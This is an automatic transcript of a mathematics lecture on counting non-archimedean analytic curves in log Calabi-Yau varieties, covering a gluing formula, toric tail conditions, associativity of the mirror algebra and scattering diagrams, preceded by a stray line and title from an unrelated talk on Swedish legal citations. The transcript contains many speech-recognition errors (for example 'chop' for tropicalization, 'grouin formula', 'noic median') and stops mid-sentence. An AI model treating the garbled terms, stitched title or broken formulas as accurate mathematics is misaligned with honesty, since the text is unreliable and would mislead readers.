this sum so far of the number of court cases or decisions. And with that I think should we move on to the parliamentarian documents? Yeah, that sounds like a good one.
|
Citations in Swedish Parliamentary and Judicial documents and their use
|
10.5446/51040 (DOI)
|
Thank you for coming to the last session of this mini course. Let me first share with you the files in the chat and also... Yes, so let's start. Here is where we were on Monday. The idea of the gluing formula is as follows. Roughly the gluing formula states that we can glue two open curves along two opposite boundary components and form a bigger concatenated curve like this. And the count of the concatenated curve should be the product of the counts of the two initial curves by this formula. So this is more convincing evidence that our counts really reflect open curve counting. It is also an essential ingredient in the proof of the associativity of the mirror algebra. Now let's establish this gluing formula in three steps. Step one, given two spans S1 and S2 in the essential skeleton of U, assume we have an infinite one-valent vertex W1 and an internal infinite one-valent vertex, meaning that it's mapped to the essential skeleton instead of to the boundary. So assume we have such a vertex W1 in S1 and respectively we have an internal infinite one-valent vertex W2 in S2 such that the two vertices map to the same point in the essential skeleton SKU. Next we consider a span delta with three infinite one-valent vertices W1, W2, W and mapping constantly to this point where the previous W1 and W2 go. So we consider this span which maps constantly to the same point and this span has just one three-valent vertex and three infinite legs. So we can glue this constant span delta to S1 and S2 along W1 and W2 and form a new span S like this in the essential skeleton of U. Here the infinite one-valent vertices W1 and W2 they become nodes in the new span after we glue. So in the new span this is an infinite edge containing a node and this is another infinite edge containing a node. Now we have the following M. For any curve class gamma we have the following equality that is the count associated to the span S and the curve class gamma by evaluating at this internal marked point W is equal to the sum over all the compositions of gamma into gamma 1 plus gamma 2 of the count associated to the span S1 curve class gamma 1 times the count associated to the span S2 curve class gamma 2. So for S1 we evaluate at the point W1 and for S2 we evaluate at the point W2. So this is the formula we have for the count of the glued span since this part is constant it doesn't contribute. The proof is not difficult by passing to a big enough base field extension this follows from a set theoretical decomposition of the set of skeletal curves associated to S of the left hand side to products of sets of skeletal curves associated to S1 and S2 respectively. So after big enough base field extension it reduces just to a set theoretical equality one can just check by hand. So this is the first step of gluing we glue two spines with this auxiliary spine at these infinite vertices. Now let's consider the second step of gluing. So in the second step we are given two spines S1 and S2 in the essential skeleton of U both transverse to walls and assume we have a point P1 in gamma 1 the domain of S1 and P2 in gamma 2 the domain of S2 both in the interior of some edge and we assume that they map to the same point in the essential skeleton and also they do not meet wall. Since they map to the same point we can glue so we can glue S1 and S2 along the points P1 and P2 and obtain a new transverse spine S in the essential skeleton of U like this we just glue these two together at the point P1 and P2. Then we have a similar lemma saying that for any curve class gamma we have the following equality which says that the count associated to the glued spine S and any curve class gamma is equal to the sum over all the compositions of gamma into gamma 1 plus gamma 2 of the count associated to the first spine S1 and the curve class gamma 1 times the count associated to the second spine S2 and the curve class gamma 2. Here is the proof for this for this equality so for the proof we add an infinite leg W to S at P because if you recall that in our definition of counts we always need some internal mark point in order to evaluate and we proved using skeletal curves we proved a symmetry theorem saying that the place where we evaluate eventually does not matter but for the just the first to construct the count we always need some internal mark point so let's add it let's add the infinite leg W to S at P at this the point we glue P and then we count this spine by evaluating at this point W and after adding this infinite leg now we can deform by stretching this point P and make appear two small edges E1 and E2 so this is a small deformation of this by stretching the point P and that now W is attached the leg W is attached to the middle of this purple of the two new purple edges and if we further stretch if we further stretch the two vertical edges E1 and E2 to make them of infinite length and contains contain a node so we make each edge infinite length to contain a node then we arrive at the gluing situation of step one and note that in this stretching process all spines are transverse so their counts do not change by deformation invariance and now we just conclude by the lemma we proved in step one we show and we conclude our proof for this equality so this is the second step to establish the gluing formula it's it uses a deformation invariance for transverse spines as well as the previous lemma that we established for the counts of such a glued span with this auxiliary with this auxiliary span delta in the middle so finally in step three for the gluing formula we are given two spines S1 S2 in the essential skeleton of you both transverse to wall like this S1 S2 and assume we have finite one valent vertices V1 in the domain gamma 1 of S1 and the V2 in the domain gamma 2 of S2 such that they map to the same point in the essential skeleton of you and we assume that we have opposite derivatives meaning that the derivative at V1 of H1 plus the derivative at V2 of H2 is zero since they have opposite derivatives and they map to the same point in the essential skeleton of you we can glue S1 and S2 along V1 and V2 and obtain a new transverse span S like this in the essential skeleton and here is the final theorem the final gluing formula for any curve class gamma we have the following equality which says that the count associated to this glued span S and any curve class gamma is equal to the sum of all the over all the compositions of gamma into gamma 1 plus gamma 2 of the count associated to the left part S1 with curve class gamma 1 times the count associated to S2 and the curve class gamma 2 so this is the final gluing formula and it is a generalization of the two dimensional case in my previous paper but here I'm presenting a more conceptual proof via deformation invariance so the proof the idea of the proof is the following so we want to prove that when we glue these two together we have this formula for the count and let's make a small extension of S1 this is our S1 we make a small extension of our S1 at V1 to S1 hat by linearity so we just extend linearly at this vertex V1 extend a little bit this purple part is our extension and similarly we make a small extension of S2 at V2 by linearity to S2 hat and by deformation invariance for this transverse truncated spice the count remain the same the counts do not change when we make these small extensions as long as we do not meet walls and now after making the two small extensions observe that if we glue S1 hat and S2 hat together by identifying V1 and V2 so let's glue S1 hat and S2 hat together at V1 and V2 we see that once we do that this gluing is actually just equal to the glued span S to the gluing of S with some small straight span L so this gluing S1 hat S2 hat at V1 and V2 it's just it's equal to the gluing of S this red S together with this purple purple edge L at the point V and both sides of this formula are gluing of two spans so we can so both sides are gluing of other such gluing situation of step two so we can apply step two to both sides of the above equality and we obtain this which says that the sum over all the compositions of gamma into gamma 1 and gamma 2 of the count associated to S1 hat and the gamma 1 times the count associated to this extended span this small extension S2 hat and gamma 2 is equal to the sum over all the compositions of gamma into beta 1 plus beta 2 of the count associated to S this red S and the curve class beta 1 times the count associated to the L this purple small straight span L and curve class beta 2 so now we have to let's compute explicitly the contribution of this part so we can explicitly compute that the count associated to L and the beta 2 is equal to 1 if beta 2 is 0 and it's equal to 0 otherwise and if we substitute if we substitute this explicit computation into the equality above we obtain the gluing formula in R0 sorry do you understand you have this purple interval L maps to a point is essentially the only contribution you have yeah L doesn't map to a point L map L maps to a small interval a small interval I see yeah yeah so it's really yeah it's not clear what does correspond to in simpleclic topology because you don't consider p1s but kind of like annular yeah it's yeah it's a very small annular map into a place without walls I see any walls I see yeah so that place is like just a torus so we have it's like we count annulus just in an algebraic torus yes so the count is really the simplest yeah either one if a curve class is zero or zero if it has if we put some non trivial curve class because it it's just a maps to a place without walls so there is nothing interesting happening yeah so via these three steps we obtain this gluing formula zero and let me remark that similar idea can be applied to show that our accounts are independent on the choice of the torus when we impose the toric tail condition assume we have two torus embeddings tm in you and the tm prime in you just two different embeddings leading to two different toric tail conditions t and t prime so recall that in the definition of our naive accounts of skeletal curves in order to obtain a finite dimension or modular space we need to impose some extra condition and the some extra regularity condition on the boundary via analytic continuation and that the condition called the toric tail condition was formulated according to the choice of some torus torus embedding now we want to show that it's independent of the torus embedding using the same idea in the proof of the gluing formula so assume we have two torus embeddings tm in you and the tm prime in you leading to two different the toric tail conditions quality and quality prime and now we consider a span s like this in the essential skeleton of you with a finite one valent vertex v so here the span s is the whole graph including the purple part this is our span s it has a finite one valent vertex v so we want to show that the count of this span s does not depend on which tail condition we impose at this end v for this let's pick w some point w very close to v and let l denote the restriction of the span s to this small interval w v so this purple interval is just a restriction of s to a small neighborhood of v and then we pick any point x in the middle of w and v and we consider the gluing of s with l so it's similar to the gluing we considered a moment ago here when we consider gluing of s and l we get like this part gets doubled it's like they're double now by step two above we obtain the following equality so here you see that we are gluing we are gluing two spans at some interior point of edges which is the situation of step two and so we can apply the formula in step two and now if we apply the formula in step two we obtain the following so the left hand side yeah so when we apply we think like this for the the left hand side is the sum over all the compositions of gamma into beta plus delta of the count associated to s using the tail condition the first the tail condition t everywhere times the count associated to l using the tail condition t prime at v and t at all at the other end of l so this left hand side so we can think of l as for the left hand side we put the toric tail condition t everywhere on s but for l we put the toric tail condition t at w but tail condition t prime at v and then we apply the step two above to this gluing now for the right hand side we just think that for the gluing we switch we switch this part of l with this part of s which means that it's the sum over all the compositions of gamma into beta plus delta of the count associated to our span s where we use the tail condition t prime at v and t in all other places now at times the count associated to this small interval l where we apply tail condition t at both ends so it's really so the left hand side as I said the difference between the left hand side and the right hand side it's how we think of the gluing it's like we are switching that half of l with that last piece of s so one piece has the toric tail condition t attached and the other piece has toric tail condition t prime attached when we switch them in this gluing we obtain and when we apply step two we obtain this we obtain this formula then this equality so now it remains to compute explicitly the computations of the small this l piece so we can compute as before that the count associated to l using the tail condition t and the curve class delta is equal to one if delta is zero and if it's equal to zero for all other delta and the same holds when we count the small interval l using toric using tail condition t prime at v and t at w the same equality the same count works also for the other one and we now we substitute we substitute this explicit computation into the equality above we obtain the following theorem for tail condition with varying torus so we have proved by substituting this explicit computation into the equality we have proved that the count associated to our spine s using tail condition t everywhere and and for some fixed class gamma is equal to the count associated to the spine s equal to the count associated to the spine s using tail condition t prime at v and tail condition t everywhere else these two counts are equal so here we are just switching tail condition at one vertex then of course one can switch at all other vertices and we can even apply different toric tail conditions at all finite vertices so this in other words the theorem shows that the count of skeletal curves is independent is independent is independent on the choice of the torus tm inside u so just a small remark concerning the computation for the count associated to this small interval where we put different toric tail conditions at both ends so the explicit computation for this count using two different tail conditions is a bit more subtle than for the count where we put the same tail conditions we need to use a result concerning the gluing of non-archimede polyannual in my previous paper if we put two different tail conditions because if we put the same tail condition then the count is easy it's like something yes sir you know maybe you mean that on one part of interval every put condition t prime another t but your notation your notation don't say this it's kind of like t prime everywhere yeah yeah but actually it says that it's one end is t the other end is t prime i see so i hope that it's understandable okay otherwise the notation is a bit complicated yeah so i'm saying that if at both ends we put the same tail condition then the count is easy to do because yeah yeah as maxi remarked we just map to a torus so then it's just counting something in the toric variety but if we put different tails at the two ends then the counting is a bit more complicated because it maps to some gluing of gluing of two different torus but one can show that actually one can decompose the the automorphism of the some annulus into two parts where one part can be extend can be extended to a automorphism of some disk times poly annulus and another part can be extended to automorphism of another opposite disk times the annulus so after applying this automorphism we see that we are we we are back to the previous situation just counting something in p1 times some poly annulus the computation of automorphisms of this automorphisms of the some affinoid algebra yes yeah so this is the idea for the proof of the gluing formula and also for the proof of changing tail condition and in fact this proof of changing tail condition also works if we eventually use more general tail conditions without using any embedded torus so it's easier to carry out this proof than one can imagine using like deformation variance for it feels a bit more complicated so now let's turn to the next section structure constants and associativity of mirror algebra we want to apply our gluing formula and all the other techniques we have developed so far to study structure constants and the associativity of the mirror algebra so let us recall the setting from the first lecture where we have log kala b y of variety u containing some torus tm and we have some s and c compactification of u in y we have monoid ring r over this effective curve classes assembling all possible curve classes together and the mirror algebra a it is it has basis the integer points in the essential skeleton as an arm module so this was our setup in the first lecture and again recall that given some integer points in the skeleton we write the product in the mirror algebra a as the this product of the theta functions theta p1 to theta pn in the mirror algebra a as this sum so first we sum over all integer points in the essential skeleton of the basis vector theta q and then we sum over all curve classes over all effective curve classes of the basis element z to the gamma it's just a notation for the basis elements and we denote the coefficient by chi p1 to pn q gamma and this chi is called the structure constants of our mirror algebra a and let's also recall how it was defined in in the first lecture the structure constant chi was defined as follows we had so first we figure out what was the class delta of the editory tail and we denote the total class beta to be gamma plus delta beta is supposed to be the class of the the closed p1 after the total tail extension we also had the z equal to the opposite of q in the essential skeleton and we had topo pz a putting p p1 to pn and z together and we use this topo pz to specify intersection numbers with the boundary then we considered the modular space this hpz beta with marked points labeled as p1 to pn zs so this is the modular space of maps of maps from p1 with marked points p1 to pn zs and we say that we specify the intersection of the p1 so it's the modular space of maps of p1 into y and we specify the intersection numbers at these marked points with the boundary d using the topo pz and we had a natural map phi from this modular space to here taking domain taking domain and evaluation at the last marked point s and we also had a special point qtodah in the identification of the target which was given as a pair of mu and q mu we give mu we just specify what was mu in the first factor corresponds to some divisory evaluation and q is just the given q so the given q is the integer point in the essential skeleton in particular it's a point in the identification of u so we had this special point qtodah and then finally we had a subspace f in the fiber of the map phi over qtodah which is a finite analytic space and if we take its length the length was by definition the structure constant kind of a in the first lecture first I give a heuristic picture of what we count for the structure constant about counting disks with some conditions on the derivative of the disk at the boundary and and after that I give a precise construction of the structure constant in using algebraic using noic median geometry so this was just a recall of what we did and the definition is quite straightforward but let's remark the following due to the choice of this specific point qtodah inside the target so we used this qtodah to take fiber and then take subspace due to the choice of this specific point the curves in f are responsible for structure constants although highly generic in the algebraic sense are in fact very special in other words non-transverse from the tropical viewpoint because this special point it's a generic point in the algebraic world but it's a very non-generic point in the tropical world so this results very generic curves in the algebraic sense but very special curves from the tropical in the tropical picture and this was convenient for giving a quick definition of structure constants but it's impractical for proving any properties about them for example associativity finiteness all these properties they are out of reach from this quick definition we must deform the curves in f into more transverse positions by perturbing this special point qtodah because when we want to prove properties for example if we want to apply the gluing formula or deformation invariance we usually need the assumption that the spines are transverse but if we do the count using this specific point qtodah we will not get transverse spines so we must perturb these curves by varying the point qtodah do we do it like this for a position we label the marked points of metric trees in this modular space so this is a modular space of tropical curves rational tropical curves with n plus one n plus two legs here abstract tropical curves are the same as metric trees and we label the n plus two points marked points as p1 to pn zs and let vm in the modular space be the subset consisting of metric trees whose z leg and s leg are incident to a single three valent vertex here is the picture we have such a metric tree it has a lot of legs by leg we mean infinite one valent vertex or yeah so or more precisely we mean these edges containing infinite one valent vertices so here we consider the subset where the z leg and the s leg they are incident to a single three valent vertex so the z leg and the s leg they meet first and before the tree branches to other legs yeah and we observe that this vm is is a neighborhood of this special choice of the modulus mu and next next we want to figure out a neighborhood of this special point q so let's consider a polyhedral subdivision sigma of the essential skeleton given by the set of walls in the essential skeleton here we can assume the set of walls to be finite polyhedral by bounding the degree of twigs by the fixed curve class beta so in general uh wall the set of walls they are infinitely many walls and it can be dense in the essential skeleton but if we bound some degree we get a finite set of walls so we consider the polyhedral subdivision induced by the set of walls and we let vq be the open star of the point q in sigma in other words the union of open cells in sigma whose closure contains q so we have q and we have a polyhedral decomposition we just take a cone around around the point q q might be q might lie inside a wall but it doesn't matter we take the star of q in sigma then q becomes an interior point in this open star and we said that by construction q tilde which was given as a pair mu q mu is the interior vm is a neighborhood of mu vq is enabled of q so q tilde so vm times vq is a neighborhood of q tilde inside the product of the tropical modular space and the essential skeleton and we already remarked when we talk about essential skeletons that using Tamkin's matrization theory one can show that product of skeleton is homomorphic to skeleton of product and this lies in the identification of the product yeah so using this construction we figure we figure out two natural neighborhood of sorry we figure out a natural neighborhood of the first factor of q tilde and a natural neighborhood of the second factor of q tilde so we figure out a neighborhood of q tilde i recall that our goal is to perturb the point q tilde so we will be perturbing q tilde inside this neighborhood vm times vq and now let this be the pre-image of vm times vq by the map phi analytic from this modular space by taking domain and evaluation at the last mark point s so before we took pre-image of a single point q tilde now we take pre-image of this neighborhood of q tilde and now we take curly f to be the subset in the pre-image satisfying the toric tail condition then the preposition says that phi analytic is finite at all on the neighborhood of this subset and whose degree gives the structure constant so this is how we perturb the special point q tilde into general position by allowing q tilde to vary inside this neighborhood vm times vq and we prove that if we allow q tilde to vary and when we impose toric tail condition then this map phi is still is good it's finite at all on the neighborhood of this f so the degree is well defined and it gives the structure constant since it's finite at all so we get a well defined degree and the the degree at the fiber over the point q tilde it was our quick definition of the structure constant so here the structure constant is reinterpreted as some degree of finite at our map and for its proof we use the toric tail preposition for almost the transverse spines because here it feels like deformation invariance that we are moving we are moving the spines for the structure constants inside this conical neighborhood but they do not state it's not always a transverse sometimes it it becomes non-transverse especially at the point of q tilde for example but we had developed this reposition in the last lecture not just for transverse spines but is that it is specially adapted to the situation here where we can go across the walls so after this perturbation into generic position now we can prove the following theorem the multiplication rule given by the structure constants chi here is commutative and associative here is the the sketch of proof commutativity is obvious because the definition of the structure constant chi is symmetric with respect to the p i's and associativity means that the product theta p1 theta p2 to theta pn does not change if we add arbitrary parentheses so let us now sketch the proof of the following equality where the left hand side means we first take product of theta p1 and the theta p2 and then we take product with theta p3 while the right hand side means we take the product theta p1 theta p2 theta p3 together using the multiplication rule so we want to prove this equality and we just rewrite the products using the multiplication rule and we substitute the multiplication rule into the equality and we see that the equality becomes equivalent to the following equality for every integer point q in the essential skeleton and every curve class gamma now observe that the right hand side of the equality star is given by accounts of skeletal curves associated to the spines of this shape where we have three infinite lags with derivatives p1 p2 p3 respectively and also we have one finite lag with the inward derivative q so three infinite lags with outward derivative p1 p2 p3 and one finite lag with inward derivative q and by the above proposition about perturbing q tilde we can deform the modulus of the domain here by stretching this point so we deform this point into a small path l and then we further stretch this path l very very long like this so if we stretch the path l very long we see that the point u near the top of the path l will map sufficiently close to the ray zero r inside the essential skeleton of u and we need it to be sufficiently close to the ray because we want it to lie inside the cone vr in the essential skeleton of u in as in the above proposition for the structure constant chi p1 p2 r eta recall that in our quick definition of structure constants we say that the marked point just go directly to the point q tilde and that was two non-transverse two rigid now we allow q tilde to move a little bit around but we still we always need it to be sufficiently close to the ray oq so it it should not move outside across some walls around this ray otherwise it doesn't give the correct structure constant so here we stretch this path l very long so that finally some point u near the top of the path will be sufficiently close to the ray or then then that will be good enough for defining the structure constant chi p1 p2 r eta so we can cut at the cross u apply the gluing formula and obtain the left hand side of the equality star so similarly given two spines responsible for the product in the left hand of the equality star we can glue them to form a highly stretched spine like this that is responsible for the right hand side and this completes the proof of associativity so before the break let me quickly sketch another important property of our structure constants which is the convexity property so here is the theorem of the convexity property let f be a Cartier divisor on y and consider consider an analytic disc in general position responsible for the structure constant for the structure constant chi p1 to pn q gamma then the following hold first since f is a Cartier divisor we can take its tropicalization and obtain a real valued function f chop on the essential skeleton then first we have that the sum of f chop at overall pi minus f chop at q is equal to the intersection number between f and gamma minus the degree of f and liitified restricted to the punctured disc meaning the disc minus all the marked points and the second if f is an f and the minus f restricted to you is effective then we have f chop of q is less than or equal to the sum of f chop at every pi and furthermore assume f is ample and the minus f restricted to you is effective then the above equality inequality is an equality if and only if f maps the punctured disc into the torus and the proof uses some detailed computation using semi-stable models of curves the convexity theorem implies the following finiteness result finiteness result one given p1 to pn in the essential skeleton of you some integer points in the essential skeleton of you then there are at most finitely many pairs q gamma where q is an integer point in the essential skeleton of you and the gamma is a curve class such that the structure constant is nonzero let me give a quick proof how the finiteness follows from the convexity so since u is a fine we can find the regular functions x1 to xl on you such that the set of points in the essential skeleton where the norm of xi at b is bounded by some real number c for all i this set is a is bounded for any real number c now if the structure constant is nonzero so by the convexity statement two we apply the convexity statement to the car t a divisor given by these regular functions we obtain this equality the norm of xi of the function xi at q is less than or equal to a sum of is less than or equal to sum over all j of x the norm of xi at pj and this shows that given p1 to pn there are at most finitely many q such that the structure constant is nonzero for some gamma so this bounds q and the next let's bound the gamma we want to bound both q and the gamma and the assumption that u is a fine implies that there is an ample divisor f on y such that minus f restricted to u is effective and now we apply the convexity theorem one the statement one this statement and we obtain this the following equal the following equality and inequality which says that the intersection number between f and the gamma is equal to the sum of f drop at every pi minus f drop at q plus the degree of the analytic f restricted to the punctured disk and since minus f restricted to u is effective and this degree is non-positive so we see that this is less than equal to this and this is fixed the right hand side this bounds gamma by the amponeness of f so this is how we deduce the finiteness result from the convexity property and the finiteness result is important because it implies that the two sums in the multiplication rule here they are finite sums so the multiplication rule gives an algebra structure on the free r module a instead of just some formal algebra structure and in fact we have the following stronger finiteness result too which says that the mirror algebra is a finitely generated r algebra and for its proof we need to result to the equivalent boundary torus action on the mirror algebra so here due to time constraints I will omit this boundary torus action and finite generation result in this lecture and after the break I will explain the application towards cluster algebra and also I will explain the wall crossing how to get scattering diagrams using these counts of analytic curves so let's make five minutes break okay thank you so here is the plan for the last part of this lecture first I'll explain how to construct a scattering diagram via infinitesimal analytic cylinders and the second I'll prove the property of theta function consistency for the scattering diagram and third we will set all curve classes to zero so that we no longer care about the compactification and the fourth I'll explain the class we will apply the above to the case of cluster algebra where I need to introduce two new notions C twigs and the C walls especially for the cluster case and finally I'll explain the comparison with the work of gross hacking kio condo savage on the for class with the work of gross hacking kio condo savage for cluster algebras so let's start with first scattering diagram via infinitesimal analytic cylinders both in the yes both in the original suggestions by condos savage soba man and in the gross seabird program the construction of a mirror variety relies on the combinatorial algorithmic construction of scattering diagram also known as wall crossing structure our construction our construction of the mirror algebra by counting non-archimedean analytic disks as in the previous lectures completely bypasses any use of scattering diagram nevertheless our geometric approach also allows us to give a direct construction of the scattering diagram by counting infinitesimal analytic cylinders without the step-by-step condos savage soba man algorithm and this has three implications first it gives a geometric interpretation of the combinatorial scattering diagram second conversely we obtain a combinatorial way for computing the non-archimedean curve counts and third it paves the way for the comparison with the work of gross hacking kio condo savage on cluster algebras let me also remark that there are recent works of argus gross gross seabird gross seabird give another geometric interpretation of scattering diagram based on the theory of punctured log curves developed developed by abramovich chain gross and seabird now let us sketch our construction of the scattering diagram via infinitesimal analytic cylinders recall we have our log halabi au containing some torus tm and is contained in some s and c compactification y and we denote by n the dual of m so definition given a hyperplane n-purple in mr m tensor with r and any generic point x in the hyperplane m-purple generic means that it's not contained in any other n-purple it's only contained in this one hyperplane and say we are given two vectors v and w in m minus n-purp and the curve class alpha let v x v w be the infinitesimal spine here bending at x with incoming direction w and outgoing direction v and this gives rise to the associated count of analytic curves n v alpha so we consider this infinitesimal spine bending once at a generic point x in the hyperplane m-purple with specified the incoming and outgoing direction and we consider the associated count of analytical curves then using all these counts for any x in some hyper for any generic point x in some hyperplane and perp we define the following wall crossing transformation and psi x n acts on the basis vector z to the v as follows if we if so for all v in m which pairs with n positively we define the value of psi x n at z to the v to be the sum over all possible vector of all vectors of every vector w in m which pairs with n positively and over all curve class of the basis vector z alpha z w with coefficient the count we just defined so in other words we just sum over all possible incoming direction w and all possible curve class and if for all v in m which pairs with n trivially which lies in the hyperplane we just defined it to be z to the v it doesn't the wall crossing transformation does nothing for z v and unlike in the multiplication rule this sum does not is not a finite sum but this converges in the natural eddyc topology which we describe here since this cone of curves may not be polyhedral we fix a strictly convex toric monoid q containing this effective curve classes and let our hat be the completion of the monoid ring over q direct sum m with respect to the maximum monomial ideal i in other words the ideal generated by monomials z qz m with q nonzero and arbitrary m so we use this completion to express the convergence lemma convergence lemma the formal sum in the wall crossing transformation lies in our hat so the reason is that when we give bound on curve classes it implies bound on the combinatorial types of the two-weeks of all analytical curves contributing to these counts and this in turn gives a bound on the incoming directions w so now by linearity over this monoid ring we can extend the wall crossing transformation transformation to a map from the monoid ring over all curve classes plus direct sum with the subset of the lattice m which pairs with m nonactively and the map goes to our hat we just here we defined what it does on the basis vectors and we extended by linearity over the monoid ring theorem wall crossing homomorphism theorem the map psi xn is a ring homomorphism so it means that if we pick arbitrary m1 m2 in m that pairs with n nonactively we want to show that we have a psi applied to z to the power n1 plus m2 is equal to psi of z to the m1 times psi to the z of m2 it's what means for the map to be a ring homomorphism so let's try to prove this we let's fix any vector e in m and any curve class alpha and let's prove the equality of the coefficients of z alpha ze inside the formula above note that it's obvious the equality is obvious when both m1 and m2 lies in n-perf because if they lie in they lie in n-perf then the wall crossing transformation does nothing on them so we may assume that one of them pairs with n positively so assume that the pairing between n and m1 is positive and the pairing between n and m2 is non-strictly positive and we consider the count of analytic pair of pants associated to this spines with three just various infinitesimal spine with three legs with three ends near x with directions m1 m2 minus e at the three ends so claim suppose x is contained in the wall sigma then the count of analytic pair of pants is independent of which side of sigma the three valent vertex of this our spine maps to here the left picture shows this spine mapping to the essential skeleton and this blue blue line is a wall and the left picture shows the situation where the three valent vertex maps to the left the three valent vertex maps to the left and the right picture shows the situation where the three valent vertex maps to the right so the claim says that the count is independent of which side the three valent vertex go let's further observe that in the left picture when we specify the directions m1 m2 and e this the shape of the spine is unique which we denote by sl because there is only one possible band and that band is determined by the three directions at the ends however in the right picture the shape of the spine is not unique because we have two bands and this band when we deform from left to right this band is decomposed into two bands and all possible ways of decomposition are allowed so for the right hand picture we are actually in summing over many we are summing over many different shapes of spines which we denote by sri sorry Tony yeah the source stability is even m2 is parallel to the wall which is yes yes this is the trickiest this is the trickiest possibility but i allow m2 to be parallel to the wall here what is your doubt where is your doubt no doubt no no it's allowed yeah yeah and it's exactly the possibility where m2 is parallel to the wall that possibility implies that like the that the preservation of volume elements we see so yeah so we keep in mind that we also have the possibility m2 parallel to the wall yeah so as Maxim remarked that here in the proof we use the proposition for toric for tail conditions in families in the last lecture and the trickiest case is when one of m1 or m2 lies in m-purp one of them is parallel to the wall where we need to use the deformation invariance for almost the transverse suspense so now let's go back to the proof of the theorem this is proof for the claim about deformation invariance when we move from left to right and now let's back to the proof of the wall crossing homomorphism theorem note that for any span l disjoint from walls the count nl gamma is 1 if gamma is 0 and is 0 otherwise because if it's disjoint from walls we are essentially in the toric situation and everything can be computed explicitly keeping this in mind now we consider first the left picture if we cut the spine sl at the cross by the grouin formula then by the grouin formula the count associated to s alpha sl this red span sl and any curve class alpha gives the coefficient of z alpha ze in this wall crossing transformation because when we cut at this cross the left part is disjoint from wall so it doesn't contribute while the right part has a band and the right part is exactly the infinitesimal cylinders that we use in the definition of the wall crossing formula so therefore when we count analytic curves associated to sl we get the coefficient in this wall crossing transformation and the next if we cut next let's consider the right picture where the three valent vertex maps to the right if we cut the spine sri at the two crosses but then by the grouin formula so we cut at these two places now the spine is broken into three pieces note that the right piece is disjoint from any walls so the right piece doesn't contribute but the two left pieces they both contribute and they both have a band and we just add their contributions together so by the grouin formula we see that the count associated to this the count associated to this spine sri is equal to the sum over all the compositions of curve class alpha into alpha one plus alpha two of the count associated to this upper left spine times the count associated to the lower left part and we remarked that when the three valent vertex maps to the right of the wall we have different shapes parametrized by i and next we sum over all possible shapes sri and we see that the sum of counts associated to sri gives exactly the coefficient of z alpha ze inside the product of the two wall crossing transformations so we concluded the proof of wall crossing homomorphism by the claim yeah so this shows that wall crossing transformation is a ring homomorphism and we remark that the immediate consequence of the ring homomorphism is the following given any x generic any generic x in some hyperplane n perp and any vector v in m which who's pairing with n equals one so in particular this means that n is necessarily primitive vector we just rewrite psi xn at zv to be zv times some function this is just a rewriting with some function in our head then the fact that wall crossing is a ring homomorphism implies that the function f x and v does not depend on v geometrically this means that the count of infinitesimal analytic cylinders depends only on the amount of band independent of incoming or outgoing direction so for the count of this we can change incoming or outgoing direction as long as we have the same amount of band we always have the same count in particular this implies that the wall crossing transformation preserves the standard volume form on tori and moreover we have we have we have the equality between the function fx and v and fx minus and v in other words it's independent of the orientation of wall the function is independent of orientation of wall so we can denote fx so we can denote fx and v just by fx since it's independent of n and also of v for any choice of n primitive whose prep contains containing x and any choice of v with the and the pairing between nv equals one and we call fx the wall crossing function attached to x so here is the conclusion now we can write the wall crossing transformation applied to zv simply as zv times fx to the power the pairing between n and v for any for any vector v in m that pairs with n non-actively and this is the it resembles like to the more classical wall crossing formula and using this formula we see that the wall crossing transformation psi xn extends to an automorphism of the fraction field of our hat let me remark that this may not give an automorphism of our hat since the wall crossing function need not to be invertible in our hat because of curve classes it might not start with one it might just start with a curve class and that curve class doesn't is not invertible it doesn't matter first this is just how it is if we take into account curve classes and it will become invertible when we set all curve classes to zero now definition now we have all the wall crossing transformations wall crossing functions we can define what is our scattering diagram so let d be the set of pairs xfx where x is any generic point in m-perp in the hyperplane n-perp for any non-zero n and fx is the associated wall crossing function we call this set of pairs xfx we call it the the the scattering diagram associated to u with respect to the compactification y and also with respect to the torus tm so scattering diagram depends on the torus and we remarked that by the eddy convergence of fx of the wall crossing function if we mod ik where i was if we mod out some power of i where i was the maximum monomial ideal then we obtain a finite scattering diagram dk in other words finite means that we will only have finitely many polyhedral walls in dk here in d we have infinitely many walls so it no longer makes sense to say the shape of each wall they are so small it it's better just to give the wall crossing functions attached to each generic point but once we mod out some power of the maximum monomial ideal we get finite scattering diagrams dk with finitely many polyhedral walls and we call dk the case or the approximation of d and one important property for scattering diagram is the consistency consistency property so let's try to establish consistency first let us establish a variant of consistency property called which we call theta function consistency we introduce a new definition choose any generic point x in mr and the two vectors me in m and let sp x me be the set of spines in mr with domain minus infinite infinity to zero like this such that minus infinity maps to the boundary with derivative minus m and zero maps to x with derivative minus e so we consider the set of all such red spines starting from infinity ending at x with with directions m and e at the two ends and this is related to the notion of broken line in ghkk we define the local theta function theta xm to be the formal sum over all vector e and all such red spines s and all curve class of the vector z alpha the basis vector z alpha ze and with the coefficient the count associated to the the red span s and alpha and again we have addic convergence this lives in our head and we have the following theta function consistency theorem the scattering diagram d is theta function consistent in the following sense given any k we consider the case order approximation given any k we consider the case order approximation of our scattering diagram dk and we take a polyhedral wall sigma with attached wall crossing function f sigma inside dk and we choose a vector n such that the wall is contained in the hyperplane and perp and we consider two points a and b two general points near another general point x in the wall on two sides of the wall so we pick a general point x in the wall and the two general points on two sides of the wall a and b near x such that n a pairs with n positively and the b pairs with n negatively then we have the following if we apply the wall crossing transformation per se to the local theta function at a with infinite direction m we obtain the local theta function at b with the same infinite direction and conversely if we apply the wall crossing transformation per se with respect to the opposite orientation of the wall to the local theta function theta bm then we get back the local theta function theta a m this is what we call the theta function consistency property and we use the gluing formula and the deformation in variance for the proof so our next step is to forget all curve classes we want to get closer to the classical wall crossing structure or classical scattering diagram without always thinking about curve classes in our compactification so let's set all curve classes to zero as I said our wall crossing transformation and the scattering diagram depends on the compactification u inside y via the usage of curve classes in y so this is a more refined information but we can remove this dependence by setting all curve classes to zero in order to have attic convergence if we set all curve classes to zero we need to impose a condition on the band of infinitesimal analytic cylinders without extra condition we will lose attic convergence if we forget the curve classes the assumption is the following for any for any non-zero count associated to some infinitesimal spine at x with the incoming direction outgoing directions v and w if the count is non-zero then the band w minus v lies in the strictly convex monoid p inside m we need this assumption in order to have attic convergence when when we forget curve classes so and here is the new attic convergence we consider thanks to the monoid m we consider j the maximum monoid ideal in the monoid ring over p the monoid p and let l not hat be the genetic completion of zp and finally let l hat be l not hat tensor with zm over zp in other words we are taking completion of zm in the direction of the strictly convex monoid p we allow infinite sums in the p direction and only finite sums in the other direction in all other directions so for now we will be forgetting curve classes for a position under the quotient from the monoid ring associated to q direct sum p to the monoid ring associated to p when we ignore all curve classes the wall crossing functions fx in r they map to the quotient wall crossing functions fx bar in l hat meaning that when we ignore curve classes they have attic convergence in l hat and the the wall crossing transformations psi xn which used to be an automorphism of the 